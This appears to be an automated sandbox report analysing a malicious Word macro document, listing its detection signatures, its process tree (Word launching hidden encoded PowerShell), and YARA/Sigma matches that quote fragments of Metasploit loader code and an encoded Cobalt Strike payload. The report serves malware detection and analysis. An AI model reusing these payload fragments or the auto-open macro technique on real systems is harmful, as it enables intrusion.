
Windows Analysis Report attacker5.doc

Overview

General Information

Sample Name:attacker5.doc
Analysis ID:522199
MD5:4ac3d0835c1650e2ec73c8607d55ed1d
SHA1:ad6ebde97a0f082cfc812f5f99ecb83b0c4caf4b
SHA256:55c9ff8f829bf0d5bbec83127570ad149bd18bc0351c59933090af917b4451db

Detection

Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected MetasploitPayload
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Malicious encrypted Powershell command line found
Antivirus detection for dropped file
Document contains an embedded VBA macro which may execute processes
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Microsoft Office Product Spawning Windows Shell
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Machine Learning detection for sample
Sigma detected: Suspicious PowerShell Cmdline
Document contains an embedded VBA macro with suspicious strings
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document has an unknown application name
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Potential document exploit detected (unknown TCP traffic)
Detected TCP or UDP traffic on non-standard ports
Document contains embedded VBA macros
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2080 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • powershell.exe (PID: 1292 cmdline: powershell -nop -w hidden -encodedcommand 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • powershell.exe (PID: 2912 cmdline: "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: attacker5.doc
Rule: Office_AutoOpen_Macro
Description: Detects a Microsoft Office file that contains the AutoOpen Macro function
Author: Florian Roth
Strings:
  • 0x719e:$s1: AutoOpen
  • 0x5280:$s2: Macros

Dropped Files

Source: C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMP
Rule: SUSP_VBA_FileSystem_Access
Description: Detects suspicious VBA that writes to disk and is activated on document open
Author: Florian Roth
Strings:
  • 0x5488:$s1: \Common Files\Microsoft Shared\
  • 0x2a46:$s2: Scripting.FileSystemObject
  • 0x644c:$s2: Scripting.FileSystemObject
  • 0x2da3:$a3: AutoOpen
  • 0x70a6:$a3: AutoOpen
  • 0x729f:$a3: AutoOpen
  • 0x8f45:$a3: AutoOpen

Memory Dumps

Source: 00000002.00000002.418638987.0000000002DA7000.00000004.00000001.sdmp
Rule: SUSP_PS1_FromBase64String_Content_Indicator
Description: Detects suspicious base64 encoded PowerShell expressions
Author: Florian Roth
Strings:
  • 0x63a8:$: ::FromBase64String("H4s
  • 0x63a8:$: ::FromBase64String("H4sIA

Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp
Rule: Msfpayloads_msf_ref
Description: Metasploit Payloads - file msf-ref.ps1
Author: Florian Roth
Strings:
  • 0x6ba0:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')
  • 0x7148:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual',
  • 0x7236:$s5: = [System.Convert]::FromBase64String(
  • 0x6e5c:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]]
  • 0x7086:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,

Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp
Rule: Cobaltbaltstrike_Payload_Encoded
Description: Detects CobaltStrike payloads
Author: Avast Threat Intel Team
Strings:
  • 0x725c:$s11: 38uqIyMjQ6rGEvFHqHETqHEvqHE3qFELLJRpBRLcEuOPH0JfIQ8D4uwuIuTB03F0

Source: 00000002.00000002.421617900.0000000003A93000.00000004.00000001.sdmp
Rule: JoeSecurity_MetasploitPayload_1
Description: Yara detected MetasploitPayload
Author: Joe Security

Source: 00000002.00000002.417824735.0000000000350000.00000004.00000020.sdmp
Rule: WiltedTulip_WindowsTask
Description: Detects hack tool used in Operation Wilted Tulip - Windows Tasks
Author: Florian Roth
Strings:
  • 0x698a:$x3: -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started; Author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: powershell -nop -w hidden -encodedcommand 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
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: powershell -nop -w hidden -encodedcommand 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
Sigma detected: Suspicious PowerShell Cmdline
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community; Data: Command: powershell -nop -w hidden -encodedcommand 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
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Source: Process started; Author: John Lambert (rule); Data: Command: powershell -nop -w hidden -encodedcommand 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
Sigma detected: Non Interactive PowerShell
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -nop -w hidden -encodedcommand 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

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: attacker5.doc; Virustotal: Detection: 49%
Source: attacker5.doc; Metadefender: Detection: 40%
Source: attacker5.doc; ReversingLabs: Detection: 45%
Antivirus / Scanner detection for submitted sample
Source: attacker5.doc; Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\~DF8739F9799F11C9B7.TMP; Avira: detection malicious, Label: HEUR/Macro.Downloader.YPA.Gen
Machine Learning detection for sample
Source: attacker5.doc; Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll